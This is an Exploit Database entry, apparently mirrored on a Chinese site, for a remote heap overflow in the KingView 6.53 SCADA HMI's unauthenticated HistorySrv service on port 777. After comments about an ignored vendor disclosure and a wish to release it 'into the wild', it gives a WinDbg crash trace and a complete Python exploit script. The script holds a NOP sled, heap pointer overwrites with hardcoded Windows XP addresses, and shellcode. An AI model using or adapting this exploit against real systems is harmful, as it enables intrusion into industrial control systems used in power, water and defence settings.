KingView 6.5.3 – SCADA HMI Heap Overflow

• Exploit Database
• 105 阅读

• 作者： Dillon Beresford
  日期： 2011-01-09
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15957/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104

  ## Exploit Title: KingView 6.53 SCADA HMI Heap Overflow PoC ## Date: 9/28/2010 ## Author: Dillon Beresford ## Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53_EN.rar ## Version: 6.53 (English) ## Tested on: Windows XP SP1 ( works on SP2 and SP3 ) will release new targets after CERT advisory is public.   ## Shouts to HD Moore JDuck, Egyp7, todb, |)ruid, nate and the rest of the AHA! crew. ## Thanks to all who share knowledge about heap smashing and heap bypass techniques.   ## Notified CERT and the vendor, CERT notified the vendor as well, vendor never responded. ## No patch or response from vendor as of 1/9/2011 ## Lets get this into the wild and see how long it takes them to respond.   ## Looks like persistence pays off. :-)   ## SP2/SP3 targets will be available soon. (putting into metasploit this is just a poc to get response from vendor). ## Vendor: Beijing WellinControl Technology Development Co.,Ltd ## http://www.wellintek.com   ## Beijing WellinControl Technology Development and CHINA CERT were notified on Tue, Sep 28, 2010 at 6:31 AM ## I have made every attempt and yet they choose to ignore... ## This PoC should wake up the dragon. >:-] ## With more to come!   ## KingView software is a high-pormance production which can be used to building a data information ## service platform in automatic field. KingView software can provid graphic visualization which takes ## your operations management, control and optimization . KingView is widely used in power, ## water conservancy,buildings, coalmine, environmental protection, metallurgy and so on. ## And now KingView software is used in national defense, Aero-Space in China.   ## Notes: The HistorySrv process listens on TCP port 777 ## This process does not require any authentication from clients   ## An attacker could replace the Flink and Blink pointers with evil ones.. Herrow srweeping dragon.   ## Windows XP SP1 (x86) ## CommandLine: "C:\Program Files\Kingview\HistorySvr.exe" ## eax=00241eb4 ebx=7ffdf000 ecx=00000003 edx=77f6eb08 esi=00241eb4 edi=00241f48 ## eip=77f767cd esp=0012fb38 ebp=0012fc2c iopl=0 nv up ei pl nz na po nc ## cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202 ## ntdll!DbgBreakPoint: ## 77f767cd ccint 3 ## 0:000> g ## ModLoad: 71950000 71a34000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805\comctl32.dll ## ModLoad: 5ad70000 5ada4000 C:\WINDOWS\System32\uxtheme.dll ## ModLoad: 71a50000 71a8b000 C:\WINDOWS\system32\mswsock.dll ## ModLoad: 71a90000 71a98000 C:\WINDOWS\System32\wshtcpip.dll ## (318.6d4): Access violation - code c0000005 (first chance) ## First chance exceptions are reported before any exception handling. ## This exception may be expected and handled. ## eax=42424242 ebx=00000285 ecx=44444444 edx=00d38110 esi=00d38110 edi=003a0000 ## eip=77f6256f esp=0012f36c ebp=0012f584 iopl=0 nv up ei pl zr na pe nc ## cs=001bss=0023ds=0023es=0023fs=0038gs=0000 efl=00010246 ## ntdll!RtlAllocateHeapSlowly+0x6bd: ## 77f6256f 8901mov dword ptr [ecx],eaxds:0023:44444444=???????? ## 0:000> u ## ntdll!RtlAllocateHeapSlowly+0x6bd: ## 77f6256f 8901mov dword ptr [ecx],eax ## 77f62571 894804mov dword ptr [eax+4],ecx ## 77f62574 3bc1cmp eax,ecx ## 77f62576 7534jne ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac) ## 77f62578 668b06mov ax,word ptr [esi] ## 77f6257b 663d8000cmp ax,80h ## 77f6257f 732bjae ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac) ## 77f62581 0fb7c8movzx ecx,ax     ## usage python exploit.py 127.0.0.1 777   import os import socket import sys   host = sys.argv[1] port = int(sys.argv[2])   print " KingView 6.53 SCADA HMI Heap Smashing Exploit " print " Credits: D1N | twitter.com/D1N "   shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9" "\x44\x80\xc2\x77" "\xFF\xD1\x90\x90")   exploit = ("\x90" * 1024 + "\x44" * 31788) exploit += ("\xeb\x14") # our JMP (over the junk and into nops) exploit += ("\x44" * 6) exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74] exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter() exploit += ("\x90" * 21) exploit += shellcode   print "[+] Herrow Sweeping Dragon..." print "[+] Sending payload..."   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(exploit) data = s.recv(1024)   print "[+] Closing connection.." s.close() print "[+] Done!"